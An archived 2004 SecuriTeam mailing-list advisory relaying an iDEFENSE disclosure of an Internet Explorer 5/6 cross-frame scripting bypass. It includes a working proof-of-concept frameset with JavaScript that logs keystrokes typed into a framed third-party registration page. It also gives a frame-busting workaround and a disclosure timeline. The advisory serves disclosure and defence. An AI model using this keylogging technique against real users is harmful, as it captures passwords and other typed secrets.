[NT] Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass
From: SecuriTeam (support_at_securiteam.com)
Date: 03/01/04
- Previous message: SecuriTeam: "[NT] RealSecure/BlackICE Server Message Block (SMB) Processing Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 1 Mar 2004 18:54:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass
------------------------------------------------------------------------
SUMMARY
<http://www.microsoft.com/ie/> Internet Explorer is a set of core
technologies in Microsoft Windows operating systems that provide web
browsing functionality.
Exploitation of an access validation error within Internet Explorer allows
remote attackers to bypass the restrictions imposed on cross frame
scripting.
DETAILS
Vulnerable Systems:
* Internet Explorer versions 5 and 6 on Windows 2000
* Internet Explorer versions 5 and 6 on Windows XP
Immune Systems:
* Internet Explorer version 5 on Windows 98
The problem is a direct result of invalid restrictions within the event
handling routines of Internet Explorer. According to Microsoft Knowledge
Base Article 167796 (
<http://support.microsoft.com/support/kb/articles/Q167/7/96.asp>
http://support.microsoft.com/support/kb/articles/Q167/7/96.asp) access
between frames located on different domains should be restricted. It is
possible to bypass those restrictions via a malicious Javascript outside
the defined frameset within the parent HTML and forcing the target
frameset to maintain focus.
The example below will display the captured keystrokes from the iDEFENSE
registration page in the status bar of the frameset:
< html>
< head>< title>IE Cross Frame Scripting Restriction Bypass
Example</title>
< script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
< frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
< frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset>
</html>
Keyboard events appear to be the only events that are leaked across
framesets. The malicious JavaScript can monitor all keystrokes typed
within the targeted frameset and could be used to transmit the keystrokes
to a remote location.
A victim would be alerted to this attack by noticing an incorrect URL in
the address bar or improper name on the SSL certificate. Therefore,
chances of success can be greatly increased when combining exploitation of
this vulnerability with the Internet Explorer URL Canonicalization
Vulnerability (MS04-004).
Workaround
Website administrators can prevent exploitation of this kind on their own
site by ensuring that the site is not encapsulated within a frameset. The
following snippet of JavaScript can be utilized to accomplish this:
if (top != self)
{
top.location=self.location;
}
Vendor Status:
Microsoft has been contacted and have confirmed this is a bug. However,
their claims are that this is not a 100% security vulnerability.
Disclosure Timeline
February 4, 2004 Vulnerability acquired by iDEFENSE
February 10 2004 Initial vendor notification
February 10 2004 Initial vendor response
February 11, 2004 iDEFENSE clients notified
February 27, 2004 Public disclosure
ADDITIONAL INFORMATION
The information has been provided by
<mailto:idlabs-advisories@idefense.com> iDEFENSE Security Advisory.
The original article can be found at:
<http://www.idefense.com/application/poi/display?id=77&type=vulnerability>
http://www.idefense.com/application/poi/display?id=77&type=vulnerability
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] RealSecure/BlackICE Server Message Block (SMB) Processing Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
